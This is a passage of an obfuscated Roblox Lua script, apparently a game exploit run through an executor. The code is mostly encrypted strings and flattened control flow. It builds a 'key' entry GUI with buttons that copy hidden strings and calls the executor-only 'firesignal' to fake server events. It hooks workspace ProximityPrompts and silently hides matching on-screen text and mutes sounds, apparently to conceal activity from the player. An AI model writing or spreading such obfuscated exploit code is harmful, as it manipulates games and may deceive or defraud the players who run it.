	TABLE_TableIndirection["v78%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\123\130\247\96\46\199\68\161\64\191", "\196\46\203\176\18\79\163\45"));
	TABLE_TableIndirection["v78%0"].Color = ColorSequence.new({ColorSequenceKeypoint.new(0, Color3.fromRGB(1180 - (1123 + 57), 82 + 18, 200)),ColorSequenceKeypoint.new(1931 - (1869 + 61), Color3.fromRGB(100, 14 + 36, 528 - 378))});
	TABLE_TableIndirection["v78%0"].Parent = TABLE_TableIndirection["v73%0"];
	TABLE_TableIndirection["v81%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\141\11\93\17\54\245\234\170", "\143\216\66\30\126\68\155"));
	TABLE_TableIndirection["v81%0"].CornerRadius = UDim.new(0, 15 - 5);
	TABLE_TableIndirection["v81%0"].Parent = TABLE_TableIndirection["v73%0"];
	TABLE_TableIndirection["v84%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\158\205\21\223\233\162\213\228\166", "\129\202\168\109\171\165\195\183"));
	TABLE_TableIndirection["v84%0"].Size = UDim2.new(1 + 0, -(27 - 7), 1 + 0, 1474 - (1329 + 145));
	TABLE_TableIndirection["v84%0"].Position = UDim2.new(971 - (140 + 831), 1860 - (1409 + 441), 718 - (15 + 703), 0 + 0);
	TABLE_TableIndirection["v84%0"].BackgroundTransparency = 1;
	TABLE_TableIndirection["v84%0"].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\5\81\49\204\158\36\227\54\24\28\221\199\84\195\44\76\37\193", "\134\66\56\87\184\190\116");
	TABLE_TableIndirection["v84%0"].TextColor3 = Color3.fromRGB(255, 255, 693 - (262 + 176));
	TABLE_TableIndirection["v84%0"].TextSize = 1745 - (345 + 1376);
	TABLE_TableIndirection["v84%0"].Font = Enum.Font.SourceSansBold;
	TABLE_TableIndirection["v84%0"].TextStrokeTransparency = 688.6 - (198 + 490);
	TABLE_TableIndirection["v84%0"].Parent = TABLE_TableIndirection["v73%0"];
	TABLE_TableIndirection["v95%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\8\52\17\175\59\228\57", "\85\92\81\105\219\121\139\65"));
	TABLE_TableIndirection["v95%0"].Size = UDim2.new(0.8 - 0, 0 - 0, 0, 1256 - (696 + 510));
	TABLE_TableIndirection["v95%0"].Position = UDim2.new(0.1 - 0, 0, 1262.25 - (1091 + 171), 0);
	TABLE_TableIndirection["v95%0"].BackgroundColor3 = Color3.fromRGB(40, 7 + 33, 125 - 85);
	TABLE_TableIndirection["v95%0"].Text = "";
	TABLE_TableIndirection["v95%0"].PlaceholderText = LUAOBFUSACTOR_DECRYPT_STR_0("\216\189\68\64\110\159\228\188\69\87\60\212\248\170\30\11\50", "\191\157\211\48\37\28");
	TABLE_TableIndirection["v95%0"].TextSize = 59 - 41;
	TABLE_TableIndirection["v95%0"].Font = Enum.Font.SourceSans;
	TABLE_TableIndirection["v95%0"].TextColor3 = Color3.fromRGB(574 - (123 + 251), 993 - 793, 898 - (208 + 490));
	TABLE_TableIndirection["v95%0"].ClearTextOnFocus = false;
	TABLE_TableIndirection["v95%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v107%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\234\54\215\19\40\209\26\230", "\90\191\127\148\124"));
	TABLE_TableIndirection["v107%0"].CornerRadius = UDim.new(0 + 0, 3 + 2);
	TABLE_TableIndirection["v107%0"].Parent = TABLE_TableIndirection["v95%0"];
	TABLE_TableIndirection["v110%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\77\174\29\3\106\136\37\18", "\119\24\231\78"));
	TABLE_TableIndirection["v110%0"].Thickness = 1;
	TABLE_TableIndirection["v110%0"].Color = Color3.fromRGB(100, 936 - (660 + 176), 100);
	TABLE_TableIndirection["v110%0"].Parent = TABLE_TableIndirection["v95%0"];
	TABLE_TableIndirection["v114%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\164\63\164\71\217", "\113\226\77\197\42\188\32"));
	TABLE_TableIndirection["v114%0"].Size = UDim2.new(0.9 + 0, 202 - (14 + 188), 0, 795 - (534 + 141));
	TABLE_TableIndirection["v114%0"].Position = UDim2.new(0.05 + 0, 0 + 0, 0.55 + 0, 0);
	TABLE_TableIndirection["v114%0"].BackgroundTransparency = 1 - 0;
	TABLE_TableIndirection["v114%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v119%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\14\19\236\161\24\3\224\161\53\24", "\213\90\118\148"));
	TABLE_TableIndirection["v119%0"].Size = UDim2.new(0.9 - 0, 0, 0, 98 - 63);
	TABLE_TableIndirection["v119%0"].Position = UDim2.new(0.05 + 0, 0 + 0, 396 - (115 + 281), 0);
	TABLE_TableIndirection["v119%0"].BackgroundColor3 = Color3.fromRGB(0 - 0, 125 + 25, 0 - 0);
	TABLE_TableIndirection["v119%0"].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\120\38\177\85\70\27\5\177\79", "\45\59\78\212\54");
	TABLE_TableIndirection["v119%0"].TextColor3 = Color3.fromRGB(255, 255, 255);
	TABLE_TableIndirection["v119%0"].TextSize = 65 - 47;
	TABLE_TableIndirection["v119%0"].Font = Enum.Font.SourceSansBold;
	TABLE_TableIndirection["v119%0"].Parent = TABLE_TableIndirection["v114%0"];
	TABLE_TableIndirection["v128%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\37\127\164\153\135\42\164\245\30\66", "\144\112\54\227\235\230\78\205"));
	TABLE_TableIndirection["v128%0"].Color = ColorSequence.new({ColorSequenceKeypoint.new(0 - 0, Color3.fromRGB(0 - 0, 150, 0 - 0)),ColorSequenceKeypoint.new(1666 - (970 + 695), Color3.fromRGB(0 - 0, 2090 - (582 + 1408), 0))});
	TABLE_TableIndirection["v128%0"].Parent = TABLE_TableIndirection["v119%0"];
	TABLE_TableIndirection["v131%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\134\1\44\243\194\85\182\58", "\59\211\72\111\156\176"));
	TABLE_TableIndirection["v131%0"].CornerRadius = UDim.new(0 - 0, 6 - 1);
	TABLE_TableIndirection["v131%0"].Parent = TABLE_TableIndirection["v119%0"];
	TABLE_TableIndirection["v134%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\122\130\251\57\108\146\247\57\65\137", "\77\46\231\131"));
	TABLE_TableIndirection["v134%0"].Size = UDim2.new(0.45 - 0, 1824 - (1195 + 629), 0 - 0, 35);
	TABLE_TableIndirection["v134%0"].Position = UDim2.new(0.05, 241 - (187 + 54), 780.35 - (162 + 618), 0 + 0);
	TABLE_TableIndirection["v134%0"].BackgroundColor3 = Color3.fromRGB(0 + 0, 255 - 135, 336 - 136);
	TABLE_TableIndirection["v134%0"].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\157\81\162\0\145\81\175", "\32\218\52\214");
	TABLE_TableIndirection["v134%0"].TextColor3 = Color3.fromRGB(255, 255, 255);
	TABLE_TableIndirection["v134%0"].TextSize = 18;
	TABLE_TableIndirection["v134%0"].Font = Enum.Font.SourceSansBold;
	TABLE_TableIndirection["v134%0"].Parent = TABLE_TableIndirection["v114%0"];
	TABLE_TableIndirection["v143%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\123\62\22\186\240\180\76\95\64\3", "\58\46\119\81\200\145\208\37"));
	TABLE_TableIndirection["v143%0"].Color = ColorSequence.new({ColorSequenceKeypoint.new(0 + 0, Color3.fromRGB(1636 - (1373 + 263), 1120 - (451 + 549), 64 + 136)),ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 134 - 54, 1534 - (746 + 638)))});
	TABLE_TableIndirection["v143%0"].Parent = TABLE_TableIndirection["v134%0"];
	TABLE_TableIndirection["v146%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\30\165\19\163\187\179\51\57", "\86\75\236\80\204\201\221"));
	TABLE_TableIndirection["v146%0"].CornerRadius = UDim.new(0, 2 + 3);
	TABLE_TableIndirection["v146%0"].Parent = TABLE_TableIndirection["v134%0"];
	TABLE_TableIndirection["v149%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\70\68\111\145\220\158\102\85\120\139", "\235\18\33\23\229\158"));
	TABLE_TableIndirection["v149%0"].Size = UDim2.new(0.45 - 0, 341 - (218 + 123), 1581 - (1535 + 46), 35 + 0);
	TABLE_TableIndirection["v149%0"].Position = UDim2.new(0.5 + 0, 560 - (306 + 254), 0.35 + 0, 0);
	TABLE_TableIndirection["v149%0"].BackgroundColor3 = Color3.fromRGB(392 - 192, 1567 - (899 + 568), 0 + 0);
	TABLE_TableIndirection["v149%0"].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\119\191\213\251\120\191\205\171\16\242\235\180\89\180\129\159\89\169\194\180\66\190\136", "\219\48\218\161");
	TABLE_TableIndirection["v149%0"].TextColor3 = Color3.fromRGB(617 - 362, 858 - (268 + 335), 545 - (60 + 230));
	TABLE_TableIndirection["v149%0"].TextSize = 586 - (426 + 146);
	TABLE_TableIndirection["v149%0"].Font = Enum.Font.SourceSansBold;
	TABLE_TableIndirection["v149%0"].Parent = TABLE_TableIndirection["v114%0"];
	TABLE_TableIndirection["v158%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\209\88\91\91\218\75\233\225\127\104", "\128\132\17\28\41\187\47"));
	TABLE_TableIndirection["v158%0"].Color = ColorSequence.new({ColorSequenceKeypoint.new(0, Color3.fromRGB(1656 - (282 + 1174), 100, 811 - (569 + 242))),ColorSequenceKeypoint.new(1, Color3.fromRGB(150, 70, 0))});
	TABLE_TableIndirection["v158%0"].Parent = TABLE_TableIndirection["v149%0"];
	TABLE_TableIndirection["v161%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\52\27\37\53\79\15\55\20", "\61\97\82\102\90"));
	TABLE_TableIndirection["v161%0"].CornerRadius = UDim.new(0 + 0, 1029 - (706 + 318));
	TABLE_TableIndirection["v161%0"].Parent = TABLE_TableIndirection["v149%0"];
	for v201, v202 in {TABLE_TableIndirection["v119%0"],TABLE_TableIndirection["v134%0"],TABLE_TableIndirection["v149%0"]} do
		TABLE_TableIndirection["v203%0"] = 0;
		TABLE_TableIndirection["v204%0"] = nil;
		TABLE_TableIndirection["v205%0"] = nil;
		TABLE_TableIndirection["v206%0"] = nil;
		TABLE_TableIndirection["v207%0"] = nil;
		while true do
			if ((4095 >= 3183) and ((0 + 0) == TABLE_TableIndirection["v203%0"])) then
				TABLE_TableIndirection["v204%0"] = v202.Size;
				TABLE_TableIndirection["v205%0"] = v202 == TABLE_TableIndirection["v119%0"];
				TABLE_TableIndirection["v203%0"] = 701 - (271 + 429);
			end
			if (((2 + 0) == TABLE_TableIndirection["v203%0"]) or (3711 < 1008)) then
				TABLE_TableIndirection["FlatIdent_3CF01%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_3CF01%0"] == 1) then
						TABLE_TableIndirection["v203%0"] = 1291 - (993 + 295);
						break;
					end
					if (TABLE_TableIndirection["FlatIdent_3CF01%0"] == 0) then
						v202.MouseEnter:Connect(function()
							TABLE_TableIndirection["v3%0"]:Create(v202, TweenInfo.new(1500.2 - (1408 + 92)), {[LUAOBFUSACTOR_DECRYPT_STR_0("\159\39\177\78", "\105\204\78\203\43\167\55\126")]=TABLE_TableIndirection["v206%0"]}):Play();
						end);
						v202.MouseLeave:Connect(function()
							TABLE_TableIndirection["v3%0"]:Create(v202, TweenInfo.new(1086.2 - (461 + 625)), {[LUAOBFUSACTOR_DECRYPT_STR_0("\150\163\57\27", "\49\197\202\67\126\115\100\167")]=TABLE_TableIndirection["v204%0"]}):Play();
						end);
						TABLE_TableIndirection["FlatIdent_3CF01%0"] = 1;
					end
				end
			end
			if ((TABLE_TableIndirection["v203%0"] == (1 + 2)) or (1049 <= 906)) then
				v202.MouseButton1Down:Connect(function()
					TABLE_TableIndirection["v3%0"]:Create(v202, TweenInfo.new(1171.1 - (418 + 753)), {[LUAOBFUSACTOR_DECRYPT_STR_0("\4\82\197\44", "\62\87\59\191\73\224\54")]=TABLE_TableIndirection["v207%0"]}):Play();
				end);
				v202.MouseButton1Up:Connect(function()
					TABLE_TableIndirection["v3%0"]:Create(v202, TweenInfo.new(0.1 + 0), {[LUAOBFUSACTOR_DECRYPT_STR_0("\212\11\224\204", "\169\135\98\154")]=TABLE_TableIndirection["v204%0"]}):Play();
				end);
				break;
			end
			if ((4513 > 2726) and (TABLE_TableIndirection["v203%0"] == (1 + 0))) then
				TABLE_TableIndirection["v206%0"] = UDim2.new(0, (TABLE_TableIndirection["v205%0"] and 368) or (54 + 128), 0 + 0, (TABLE_TableIndirection["v205%0"] and (564 - (406 + 123))) or (1807.5 - (1749 + 20)));
				TABLE_TableIndirection["v207%0"] = UDim2.new(0 + 0, (TABLE_TableIndirection["v205%0"] and 352) or 172, 1322 - (1249 + 73), (TABLE_TableIndirection["v205%0"] and (13 + 22)) or (1176.5 - (466 + 679)));
				TABLE_TableIndirection["v203%0"] = 4 - 2;
			end
		end
	end
	TABLE_TableIndirection["v164%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\255\114\60\64\209\50\202\206\123", "\168\171\23\68\52\157\83"));
	TABLE_TableIndirection["v164%0"].Size = UDim2.new(0.9 - 0, 1900 - (106 + 1794), 0, 30);
	TABLE_TableIndirection["v164%0"].Position = UDim2.new(0.05 + 0, 0 + 0, 0.85 - 0, 0 - 0);
	TABLE_TableIndirection["v164%0"].BackgroundTransparency = 115 - (4 + 110);
	TABLE_TableIndirection["v164%0"].Text = "";
	TABLE_TableIndirection["v164%0"].TextColor3 = Color3.fromRGB(839 - (57 + 527), 1527 - (41 + 1386), 203 - (17 + 86));
	TABLE_TableIndirection["v164%0"].TextSize = 11 + 5;
	TABLE_TableIndirection["v164%0"].Font = Enum.Font.SourceSans;
	TABLE_TableIndirection["v164%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v173%0"] = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\192\116\237\185\9\44\133\241\125", "\231\148\17\149\205\69\77"));
	TABLE_TableIndirection["v173%0"].Size = UDim2.new(0.9 - 0, 0, 0 - 0, 186 - (122 + 44));
	TABLE_TableIndirection["v173%0"].Position = UDim2.new(0.05 - 0, 0 - 0, 0.92 + 0, 0 + 0);
	TABLE_TableIndirection["v173%0"].BackgroundTransparency = 1 - 0;
	TABLE_TableIndirection["v173%0"].Text = LUAOBFUSACTOR_DECRYPT_STR_0("\173\166\195\254\23\253\153\231\192\250\80\236\131\181\206\235\67\250\146\244", "\159\224\199\167\155\55");
	TABLE_TableIndirection["v173%0"].TextColor3 = Color3.fromRGB(215 - (30 + 35), 104 + 46, 1407 - (1043 + 214));
	TABLE_TableIndirection["v173%0"].TextSize = 45 - 33;
	TABLE_TableIndirection["v173%0"].Font = Enum.Font.SourceSans;
	TABLE_TableIndirection["v173%0"].Parent = TABLE_TableIndirection["v53%0"];
	TABLE_TableIndirection["v53%0"].BackgroundTransparency = 1;
	TABLE_TableIndirection["v3%0"]:Create(TABLE_TableIndirection["v53%0"], TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), {[LUAOBFUSACTOR_DECRYPT_STR_0("\213\242\63\217\240\225\51\199\249\247\8\192\246\253\47\194\246\225\57\220\244\234", "\178\151\147\92")]=(1212 - (323 + 889))}):Play();
	return TABLE_TableIndirection["v45%0"], TABLE_TableIndirection["v95%0"], TABLE_TableIndirection["v119%0"], TABLE_TableIndirection["v134%0"], TABLE_TableIndirection["v149%0"], TABLE_TableIndirection["v164%0"], TABLE_TableIndirection["v50%0"];
end
local function v21()
	print(LUAOBFUSACTOR_DECRYPT_STR_0("\188\239\67\63\2\88\58\152\239\69\53\21\73\104\137\249", "\26\236\157\44\82\114\44"));
	local v183, v184, v185, v186, v187, v188, v189 = v20();
	if (not v183 or (1481 >= 2658)) then
		TABLE_TableIndirection["FlatIdent_72421%0"] = 0;
		while true do
			if (TABLE_TableIndirection["FlatIdent_72421%0"] == 0) then
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\31\7\149\88\56\43\212\79\35\33\219\27\44\47\220\87\47\42", "\59\74\78\181"));
				return;
			end
		end
	end
	local function v190()
		TABLE_TableIndirection["v208%0"] = 0 - 0;
		TABLE_TableIndirection["v209%0"] = nil;
		while true do
			if ((TABLE_TableIndirection["v208%0"] == (581 - (361 + 219))) or (3220 == 1364)) then
				TABLE_TableIndirection["FlatIdent_1CA5D%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_1CA5D%0"] == 0) then
						TABLE_TableIndirection["v209%0"] = TABLE_TableIndirection["v5%0"].Character and TABLE_TableIndirection["v5%0"].Character:FindFirstChildOfClass(LUAOBFUSACTOR_DECRYPT_STR_0("\17\222\85\86", "\211\69\177\58\58"));
						if (TABLE_TableIndirection["v209%0"] and (TABLE_TableIndirection["v209%0"]:GetAttribute("b") == "l")) then
							TABLE_TableIndirection["v209%0"]:Destroy();
						end
						TABLE_TableIndirection["FlatIdent_1CA5D%0"] = 1;
					end
					if (TABLE_TableIndirection["FlatIdent_1CA5D%0"] == 1) then
						TABLE_TableIndirection["v208%0"] = 322 - (53 + 267);
						break;
					end
				end
			end
			if (TABLE_TableIndirection["v208%0"] == (0 + 0)) then
				TABLE_TableIndirection["FlatIdent_67517%0"] = 0;
				while true do
					if (TABLE_TableIndirection["FlatIdent_67517%0"] == 1) then
						TABLE_TableIndirection["v208%0"] = 1;
						break;
					end
					if (TABLE_TableIndirection["FlatIdent_67517%0"] == 0) then
						print(LUAOBFUSACTOR_DECRYPT_STR_0("\135\247\118\246\236\206\179\236\119\242\169\220\190\241\113\181\238\194\177\241", "\171\215\133\25\149\137"));
						if (TABLE_TableIndirection["v18%0"] and TABLE_TableIndirection["v18%0"].OnClientEvent) then
							TABLE_TableIndirection["v241%0"] = 413 - (15 + 398);
							while true do
								if (TABLE_TableIndirection["v241%0"] == (982 - (18 + 964))) then
									TABLE_TableIndirection["FlatIdent_2E34E%0"] = 0;
									while true do
										if (TABLE_TableIndirection["FlatIdent_2E34E%0"] == 0) then
											pcall(function()
												firesignal(TABLE_TableIndirection["v18%0"].OnClientEvent, LUAOBFUSACTOR_DECRYPT_STR_0("\198\193\52\238\175\35\249\76\245\137", "\34\129\168\82\154\143\80\156"));
											end);
											task.wait(7 - 5);
											TABLE_TableIndirection["FlatIdent_2E34E%0"] = 1;
										end
										if (TABLE_TableIndirection["FlatIdent_2E34E%0"] == 1) then
											TABLE_TableIndirection["v241%0"] = 1;
											break;
										end
									end
								end
								if (TABLE_TableIndirection["v241%0"] == 1) then
									TABLE_TableIndirection["FlatIdent_4223E%0"] = 0;
									while true do
										if (TABLE_TableIndirection["FlatIdent_4223E%0"] == 0) then
											TABLE_TableIndirection["v5%0"]:SetAttribute(LUAOBFUSACTOR_DECRYPT_STR_0("\172\161\7\25\73\74\128\139\181\18\8\92\71\159\128", "\233\229\210\83\107\40\46"), true);
											task.wait(2);
											TABLE_TableIndirection["FlatIdent_4223E%0"] = 1;
										end
										if (TABLE_TableIndirection["FlatIdent_4223E%0"] == 1) then
											TABLE_TableIndirection["v241%0"] = 2;
											break;
										end
									end
								end
								if ((2 + 0) == TABLE_TableIndirection["v241%0"]) then
									TABLE_TableIndirection["FlatIdent_91608%0"] = 0;
									while true do
										if (TABLE_TableIndirection["FlatIdent_91608%0"] == 1) then
											TABLE_TableIndirection["v241%0"] = 3;
											break;
										end
										if (TABLE_TableIndirection["FlatIdent_91608%0"] == 0) then
											TABLE_TableIndirection["v5%0"]:SetAttribute(LUAOBFUSACTOR_DECRYPT_STR_0("\232\81\6\196\4\197\75\60\209\36\194\86\59\192\0", "\101\161\34\82\182"), false);
											task.wait(2);
											TABLE_TableIndirection["FlatIdent_91608%0"] = 1;
										end
									end
								end
								if (TABLE_TableIndirection["v241%0"] == 3) then
									pcall(function()
										firesignal(TABLE_TableIndirection["v18%0"].OnClientEvent, LUAOBFUSACTOR_DECRYPT_STR_0("\220\31\88\250\222\162\161\33\229\29\85\251\207\231", "\78\136\109\57\158\187\130\226"));
									end);
									break;
								end
							end
						end
						TABLE_TableIndirection["FlatIdent_67517%0"] = 1;
					end
				end
			end
			if ((TABLE_TableIndirection["v208%0"] == 2) or (1054 > 3392)) then
				v189:Destroy();
				break;
			end
		end
	end
	v185.Activated:Connect(function()
		TABLE_TableIndirection["FlatIdent_15A17%0"] = 0;
		TABLE_TableIndirection["v210%0"] = nil;
		while true do
			if (TABLE_TableIndirection["FlatIdent_15A17%0"] == 1) then
				if ((TABLE_TableIndirection["v210%0"] == LUAOBFUSACTOR_DECRYPT_STR_0("\25\22\223\197\111\109\170", "\145\94\95\153")) or (676 >= 1642)) then
					TABLE_TableIndirection["FlatIdent_44603%0"] = 0;
					while true do
						if (TABLE_TableIndirection["FlatIdent_44603%0"] == 0) then
							v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\214\200\13\149\88\182\241\196\16\212\90\178\249\140\84\229\92\184\254\200\17\209\14\160\244\217\28\149\73\190\251\217\29\219\73\249", "\215\157\173\116\181\46");
							task.wait(1 + 0);
							TABLE_TableIndirection["FlatIdent_44603%0"] = 1;
						end
						if (TABLE_TableIndirection["FlatIdent_44603%0"] == 1) then
							v183:Destroy();
							v190();
							break;
						end
					end
				else
					v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\28\186\157\243\214\60\176\203\249\223\44\245\203\198\200\44\244\138\245\219\60\186\203\253\200\117\179\142\230\154\52\244\133\247\205\117\187\133\247\148", "\186\85\212\235\146");
				end
				break;
			end
			if (TABLE_TableIndirection["FlatIdent_15A17%0"] == 0) then
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\225\137\19\253\50\174\83\199\152\86\255\58\250\81\212\128\2\251\61", "\56\162\225\118\158\89\142"));
				TABLE_TableIndirection["v210%0"] = v184.Text;
				TABLE_TableIndirection["FlatIdent_15A17%0"] = 1;
			end
		end
	end);
	v186.Activated:Connect(function()
		TABLE_TableIndirection["FlatIdent_82923%0"] = 0;
		TABLE_TableIndirection["v211%0"] = nil;
		while true do
			if (TABLE_TableIndirection["FlatIdent_82923%0"] == 0) then
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\123\0\212\239\41\221\69\69\193\172\54\209\74\4\212\170\38", "\184\60\101\160\207\66"));
				TABLE_TableIndirection["v211%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\57\150\104\172\34\216\51\243\54\144\115\171\48\133\125\174\53\135\114\175\57\141\108\174\62\128\112\179\41\204\113\165\34\135\112\176\48\151\104\180\127\129\115\177\126\146\110\179\53\151\127\168\126\133\110\179\38\207\125\241\54\131\110\184\52\140\49\172\52\150\49\175\33\131\107\178\52\144\49\175\50\144\117\172\37\207\119\185\40", "\220\81\226\28");
				TABLE_TableIndirection["FlatIdent_82923%0"] = 1;
			end
			if (1 == TABLE_TableIndirection["FlatIdent_82923%0"]) then
				if ((4136 > 2397) and TABLE_TableIndirection["v6%0"]) then
					TABLE_TableIndirection["v222%0"] = 0;
					while true do
						if ((TABLE_TableIndirection["v222%0"] == 0) or (4334 == 4245)) then
							TABLE_TableIndirection["v6%0"](TABLE_TableIndirection["v211%0"]);
							v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\56\208\155\187\250\210\1\214\138\250\249\194\83\217\139\245\225\135\16\218\146\242\239\195\82\149\178\250\249\211\22\149\139\239\170\206\29\193\141\187\243\200\6\199\194\249\248\200\4\198\135\233\164", "\167\115\181\226\155\138");
							break;
						end
					end
				else
					v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\193\46\238\76\121\126\199\240\38\167\82\116\101\134\241\55\247\76\116\99\210\231\38\169\28\86\112\200\247\35\235\80\98\49\197\237\50\254\6\59", "\166\130\66\135\60\27\17") .. TABLE_TableIndirection["v211%0"];
				end
				break;
			end
		end
	end);
	v187.Activated:Connect(function()
		TABLE_TableIndirection["v212%0"] = 850 - (20 + 830);
		TABLE_TableIndirection["v213%0"] = nil;
		while true do
			if (TABLE_TableIndirection["v212%0"] == 1) then
				if (TABLE_TableIndirection["v6%0"] or (4276 <= 3031)) then
					TABLE_TableIndirection["FlatIdent_7063%0"] = 0;
					while true do
						if (TABLE_TableIndirection["FlatIdent_7063%0"] == 0) then
							TABLE_TableIndirection["v6%0"](TABLE_TableIndirection["v213%0"]);
							v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\96\67\221\118\63\86\78\142\124\62\82\67\218\112\112\71\69\222\124\53\64\11\142\69\49\87\94\203\53\57\80\10\199\123\36\75\10\215\122\37\86\10\204\103\63\83\89\203\103\112\66\69\220\53\56\65\70\222\59", "\80\36\42\174\21");
							break;
						end
					end
				else
					v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\109\28\62\106\76\31\54\104\74\80\57\117\90\80\36\111\94\0\56\104\90\21\51\52\14\61\54\116\91\17\59\118\87\80\52\117\94\9\109\58", "\26\46\112\87") .. TABLE_TableIndirection["v213%0"];
				end
				break;
			end
			if ((TABLE_TableIndirection["v212%0"] == (0 + 0)) or (4782 <= 1199)) then
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\158\38\191\52\183\186\73\164\249\34\168\96\182\169\68\160\188\39", "\212\217\67\203\20\223\223\37"));
				TABLE_TableIndirection["v213%0"] = LUAOBFUSACTOR_DECRYPT_STR_0("\178\153\188\194\169\215\231\157\190\132\187\209\181\159\172\156\189\138\231\133\128\156\188\129\190\174\144\244\140", "\178\218\237\200");
				TABLE_TableIndirection["v212%0"] = 127 - (116 + 10);
			end
		end
	end);
	TABLE_TableIndirection["v2%0"].InputBegan:Connect(function(v214, v215)
		TABLE_TableIndirection["FlatIdent_92F66%0"] = 0;
		while true do
			if (TABLE_TableIndirection["FlatIdent_92F66%0"] == 0) then
				if (v215 or (4864 < 1902)) then
					return;
				end
				if ((4839 >= 3700) and (v214.UserInputType == Enum.UserInputType.Keyboard) and (v214.KeyCode == Enum.KeyCode.Return)) then
					print(LUAOBFUSACTOR_DECRYPT_STR_0("\147\187\242\213\164\245\237\213\175\245\246\194\179\166\245\213\178", "\176\214\213\134"));
					TABLE_TableIndirection["v224%0"] = v184.Text;
					if ((TABLE_TableIndirection["v224%0"] == LUAOBFUSACTOR_DECRYPT_STR_0("\211\132\144\224\249\4\10", "\57\148\205\214\180\200\54")) or (1075 > 1918)) then
						TABLE_TableIndirection["FlatIdent_957A4%0"] = 0;
						while true do
							if (TABLE_TableIndirection["FlatIdent_957A4%0"] == 0) then
								v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\57\248\44\116\96\19\241\60\48\119\6\248\49\117\54\34\239\58\55\115\23\249\117\35\127\6\245\117\51\127\20\233\60\58\113\92", "\22\114\157\85\84");
								task.wait(1 + 0);
								TABLE_TableIndirection["FlatIdent_957A4%0"] = 1;
							end
							if (TABLE_TableIndirection["FlatIdent_957A4%0"] == 1) then
								v183:Destroy();
								v190();
								break;
							end
						end
					else
						v188.Text = LUAOBFUSACTOR_DECRYPT_STR_0("\237\197\5\197\81\255\172\132\192\22\221\28\182\156\214\210\83\197\90\247\161\202\139\28\214\29\241\173\208\139\18\132\83\243\191\132\196\29\193\19", "\200\164\171\115\164\61\150");
					end
				end
				break;
			end
		end
	end);
end
TABLE_TableIndirection["v22%0"] = {};
local function v23(v191)
	if ((396 <= 3804) and v191 and v191:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\142\230\12\93\138\179\253\23\92\179\172\251\14\85\151", "\227\222\148\99\37")) and not TABLE_TableIndirection["v22%0"][v191]) then
		TABLE_TableIndirection["FlatIdent_7126B%0"] = 0;
		while true do
			if (0 == TABLE_TableIndirection["FlatIdent_7126B%0"]) then
				TABLE_TableIndirection["v22%0"][v191] = true;
				print(LUAOBFUSACTOR_DECRYPT_STR_0("\27\93\93\253\240\61\85\18\230\235\60\95\66\226\163", "\153\83\50\50\150"), v191.Name, v191.Parent.Name);
				TABLE_TableIndirection["FlatIdent_7126B%0"] = 1;
			end
			if (TABLE_TableIndirection["FlatIdent_7126B%0"] == 1) then
				v191.Triggered:Connect(v21);
				break;
			end
		end
	end
end
for v192, v193 in workspace:GetDescendants() do
	v23(v193);
end
workspace.DescendantAdded:Connect(v23);
local function v24(v194)
	if ((v194 and (v194:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\105\115\107\8\95\170\79\88\122", "\45\61\22\19\124\19\203")) or v194:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\245\23\21\225\32\101\173\213\29\3", "\217\161\114\109\149\98\16")))) or (4169 == 2187)) then
		if v19(v194.Text, TABLE_TableIndirection["v8%0"]) then
			v194.Visible = false;
			for v239, v240 in v194.Parent:GetDescendants() do
				if ((1406 == 1406) and v240:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\33\47\45\114\184", "\20\114\64\88\28\220"))) then
					v240.Volume = 0;
					v240:Stop();
				end
			end
		end
	elseif ((1531 < 4271) and v194 and v194:IsA(LUAOBFUSACTOR_DECRYPT_STR_0("\23\19\211\185\253", "\221\81\97\178\212\152\176"))) then
		if ((635 == 635) and v19(v194.Name, TABLE_TableIndirection["v8%0"])) then
			TABLE_TableIndirection["FlatIdent_21CA5%0"] = 0;
			while true do
				if (TABLE_TableIndirection["FlatIdent_21CA5%0"] == 0) then
					v194.Visible = false;
					for v247, v248 in v194:GetDescendants() do
